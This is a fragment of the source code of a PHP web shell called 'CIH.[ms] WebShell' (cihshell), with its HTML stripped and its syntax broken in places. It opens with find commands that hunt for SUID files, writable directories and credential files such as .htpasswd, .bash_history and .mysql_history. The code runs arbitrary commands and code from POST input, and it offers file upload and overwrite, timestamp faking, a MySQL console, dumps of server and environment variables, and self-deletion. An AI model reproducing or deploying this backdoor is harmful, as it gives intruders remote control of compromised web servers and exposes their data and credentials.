'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find / -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an',
# you don't really need to edit it (;
$f = array("SHELL" => "shell","EVAL" => "eval", "MySql Suite" => "mysql", "Server Information" => "server", "Env Informaion" => "envinfo", "PHPinfo" => "phpinfo", "Shell delete" => "delete");
$ver = '0.99.1 [ beta {fix} ]';
# ok, let's start
# ^^
if(version_compare(phpversion(), '4.1.0') == -1){$_POST = &$HTTP_POST_VARS; $_GET= &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; }
if (get_magic_quotes_gpc()){foreach ($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}foreach ($_SERVER as $key=>$value){$_SERVER[$key] = stripslashes($value);}foreach ($_ENV as $key=>$value){$_SERVER[$key] = stripslashes($value);}foreach ($_FILES as $key=>$value){$_SERVER[$key] = stripslashes($value);}}
if ($auth == 0) {$_SESSION['logged'] = true;}
$safe_mode = ini_get("safe_mode"); if (!$safe_mode) {$safe_mode = 'off';} else {$safe_mode = 'On';}
$os = null; $dir = getcwd(); if(strlen($dir)>1 && $dir[1]==":") $os = "win"; else $os = "nix";
if(empty($dir)){ $opsy = getenv('OS');if(empty($opsy)){ $opsy = php_uname(); } if(empty($opsy)){ $opsy ="-"; $os = "nix"; } else { if(eregi("^win",$opsy)) { $os = "win"; }else { $os = "nix"; }}}
if($os == "nix"){$pwd = exec("pwd");} elseif($os == "win"){$pwd = exec("cd");} if(empty($pwd)) {$pwd = getcwd();}
# functions
function atime()
{list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}
function fperms($file)
{$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';}elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}else {$info = 'u';}$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;}
function conv_size($size){
if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}else {$size = $size . " B";}return $size;}
function fileread($opfile)
{$fh = fopen($opfile, 'r'); if (!$fh){error('Could not open file',$ver);} while(!feof($fh)) {$line = fgets($fh); echo htmlspecialchars($line);}}
function fileread2($opfile,$stringnum)
$fh = fopen($opfile, 'r'); if (!$fh){error('Could not open file',$ver);}
echo '
if ($stringnum){
while(!feof($fh)) {
$line = fgets($fh);
echo ''.$i.' | '.htmlspecialchars($line).' |
}} else {
while(!feof($fh)) {
$line = fgets($fh);
echo ''.htmlspecialchars($line).' |
'; }
echo '
function safq($query)
$arr = array();$res = mysql_query($query);
if (mysql_num_rows($res) > 0) {$x=0;while($row = mysql_fetch_row($res)){foreach($row as $i => $value) {$column = mysql_field_name($res,$i);$data["$column"] = $value;$arr[$x] = $data;}$x++;}}return $arr;}
function cmd_exec($cmd2)
if (isset($_POST['cmd'])) {$cmd=$_POST['cmd'];} else {$cmd = $cmd2;}
$result = '';
if(function_exists('system')){ob_start();system($cmd);$result = ob_get_contents();ob_end_clean();}
elseif(function_exists('exec')){exec($cmd,$result);$result = join("\n",$result);}
elseif(function_exists('shell_exec')){$result = shell_exec($cmd);}
elseif(function_exists('passthru')){ob_start();passthru($cmd);$result = ob_get_contents();ob_end_clean();}
elseif(is_resource($f = popen($cmd,"r"))){$result = "";while(!feof($f)) { $result .= fread($f,1024); }pclose($f);}
echo $result;
function code_eval()
{if (isset($_POST['eval'])){echo "\n result is:
function error($text, $ver)
echo '
'; do_footer($ver); die();
function notice($text)
echo "$text
function do_header($f, $auth, $os, $path)
echo '';
if (isset($_POST['cmd']) || isset($_POST['alias'])) {echo ''; } else{echo'';}
CIH.[ms] WebShell
cihshell on '.$_SERVER['HTTP_HOST'].'
| ';
echo "
CIH.[ms] |
'.$perms.' |
OS: '.php_uname().' |
safe mode: '.$safe_mode.' |
cURL: '.$curl.' |
MySQL: '.$mysql.' |
MSSQL: '.$mssql.' |
PostgreSQL: '.$pg.' |
Oracle: '.$ora.' |
PHP: '.phpversion().'
if (!empty($disfun)){ echo '
disabled functions: '.$disfun.'
function do_footer($ver)
echo '
# end of functions
if (!empty($_POST['login']) && !empty($_POST['password'])){
if ($_POST['login'] == $login && $_POST['password'] == $password){
$_SESSION['logged'] = true;} else {echo '
incorrect login or password |
'; die();}}
if (isset ($_POST['do']) && $_POST['do']=='logout') { unset($_SESSION['logged']); }
if ($_SESSION['logged'] == true){
if (isset($_POST['do']) && $_POST['do']=='phpinfo'){echo''; phpinfo();echo'';die();}
if (isset($_POST['fdo']) && isset($_POST['ffile'])){
$ffile = $_POST['ffile'];
case 'download':
$fl = $_POST['filename'];header("Content-type: application/x-octet-stream");header("Content-disposition: attachment; filename=".$fl.";");readfile($ffile);die();break;
case 'preview':
include($_POST['ffile']);die(); break;
if ($_POST['f_file'] == "..")
{ $slashpos = strpos($_POST['f_path'], strrchr($_POST['f_path'], "/"));
$path = substr($_POST['f_path'], 0, $slashpos);
} else {$path = $_POST['f_path']."/".$_POST['f_file'];}
{$path = $_POST['path'];}
else {$path = $pwd;}
if(isset($_POST['restore'])){$path = $pwd;}
$path = str_replace("\\", "/", $path);$path = str_replace("'", "", $path);
do_header($f, $auth, $os, $path);
echo '';
# Safe-mode
# working
if (isset($_POST['safe_mode'])){
echo "
do_footer($ver); die();
# Safe_Mode functions
if (isset($_POST['sm_inc']))
echo "
do_footer($version); die();}
echo "
if ($safe_mode == "On" && !isset($_POST['safe_mode']))
if (isset($_POST['fileact'])){switch($_POST['fileact']){
case 'New File':
$cdir = $_POST['curdir'];
echo "
do_footer($ver); die();break;
case 'New Dir':
$curdir = $_POST['curdir'];
echo "
case 'Upload':
if (isset($_FILES['userfile'])) {
$file = $_FILES['userfile'];
$curdir = $_POST['path'];
if(isset($_POST['newfilech']) && !empty($_POST['newfile'])) {$nfn=$_POST['newfile'];} else { $nfn = $file['name']; }
if($file['error']!=0) error($file['error']);
else{copy($file['tmp_name'], $curdir.'/'.$nfn);if(!file_exists($curdir.'/'.$file['name']))error("Upload failed. (Can't copy temp file ".$file['tmp_name']." into current directory)", $ver);else{notice("File ".$nfn." was uploaded successfuly..");}}}
echo "";do_footer($ver);die();break;
# File Manager : File actions
if(isset($_POST['newname'])) // rename
{rename($_POST['ffile'], $_POST['newname']);if(!file_exists($_POST['newname'])){error('Could not rename '); }notice("File was successfuly renamed to ".$_POST['newname']."...");}
if(isset($_POST['newpath'])) //copy
{copy($_POST['ffile'], $_POST['newpath']);if(!file_exists($_POST['newpath'])){error('Could not copy file'); }echo " File was successfuly copied to ".$_POST['newpath']."...
if(isset($_POST['chmod'])) // chmod
{$a = chmod($_POST['ffile'], $_POST['chmod']);if(!$a){error('Could not change permissions :o(', $ver);}echo " We hope that permissions for file were successfuly changed to ".$_POST['chmod']." ^^
if(isset($_POST['touch'])) // touch
{$dt = strtotime($_POST['touch']); if(!touch($_POST['ffile'], $dt)){ error('Could not change touch time...', $ver);} echo " We hope that touch for file were successfuly changed to ".$_POST['touch']." ^^
if (isset($_POST['ffile']) && isset($_POST['wrcont'])){ // write into file
$wrpath = $_POST['ffile']; $wrcont = $_POST['wrcont'];$fh = fopen($wrpath, 'w');if ($fh){fwrite($fh, $wrcont);fclose($fh); }else {error('Couldn\'t write to file..');}echo "File $wrpath was successfuly modified
if (isset($_POST['nfname']) && isset($_POST['curdir']) && isset($_POST['wrcont'])) // new file
{$file1 = $_POST['curdir']."/".$_POST['nfname'];$fh = fopen($file1, 'w');$r = fwrite($fh, $_POST['wrcont']);fclose($fh);if (!file_exists($file1)){error('Could not create a file..');} else {notice("File was successfuly created");}}
if (isset($_POST['dirname']) && isset($_POST['curdir'])) // new directory
{$curdir = $_POST['curdir']; mkdir($curdir.'/'.$_POST['dirname']);if(file_exists($curdir.'/'.$_POST['dirname'])){notice($curdir.'/'.$_POST['dirname']." was successfuly created.");}else{error('An error occured while creating dir', $ver);}
# File Manager : Directory actions
if (isset($_POST['ddo']) && isset($_POST['dirr'])){
case 'rename':
case 'delete':
rmdir($_POST['dirr']);if(file_exists($_POST['dirr'])){error('Could not delete directory');}notice($_POST['dirr']." was successfuly deleted.");do_footer($version);break;}}
if (isset($_POST['fdo']) && isset($_POST['ffile']) && $_POST['fdo']=='delete'){
unlink($_POST['ffile']);if(file_exists($_POST['ffile'])){error('Could not delete file');}notice("".$_POST['ffile']." was successfuly deleted.");break;
{$path = $_POST['cmdir']; $perms = fperms($_POST['cmdir']);
# switch $do
if (isset($_REQUEST['do']))
switch ($_REQUEST['do']){
case 'mysql':
if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhost = 'localhost';}if (isset($_POST['mysqlw_db'])){$dbname = $_POST['mysqlw_db'];} else {$dbname = 'dbname';}if (isset($_POST['mysqlw_login'])){$dblogin = $_POST['mysqlw_login'];}else {$dblogin = 'dblogin';}if (isset($_POST['mysqlw_passw'])){$dbpass = $_POST['mysqlw_passw'];}else {$dbpass = 'dbpassword';}if (isset($_POST['mysqlw_port'])){$dbport = $_POST['mysqlw_port'];} else {$dbport = '3306';}if (!empty($_POST['sql'])){echo '';$sqlq = $_POST['sql'];$db = mysql_connect($dbhost.':'.$dbport,$dblogin,$dbpass);if($db)
{if(!empty($_POST['mysqlw_db'])) { mysql_select_db($_POST['mysqlw_db'],$db); }$queries = explode(';',$sqlq);foreach($queries as $number=>$query) {
$number++;$r = safq($query); $error = mysql_error($db);if($error == 'Query was empty'){ break;}
echo "
query # ".$number.":".htmlspecialchars($query)."
if ($error){ notice("Error :
".$error.""); }
else {if(is_array($r)){echo '
if(is_array($r[0])){echo "";foreach($r[0] as $n=>$v){echo "$n | ";}echo '
';}foreach($r as $a){echo "";
if(is_array($a)){foreach($a as $n=>$v){echo "$v | ";}}else{echo "$a | ";}echo '
';}echo '
';}else{echo $r;}if(($rows = mysql_affected_rows($db))>=0) {
echo "
affected rows : ".$rows."
"; }
}} mysql_close($db);}else {notice('Error: Could not connect to database..');} echo '
'; }
echo "
do_footer($ver); die(); break;
case 'server':
echo '';foreach($_SERVER as $k=>$v)
{echo "$k | $v |
";}echo '
case 'envinfo':
echo '';foreach($_ENV as $k=>$v)
{echo "$k | $v |
";}echo '
case 'delete':
if(unlink(substr(strrchr($_SERVER['PHP_SELF'],"/"),1))==true){echo "cihshell has been deleted successfully..bye-bye ):
"; do_footer($ver);}else{error('Unable to delete shell', $ver);} die();break;
case 'eval':
echo "
if (isset($_POST['eval'])){
echo "
do_footer($ver);die(); break;
case 'shell':
echo " ";echo "";echo"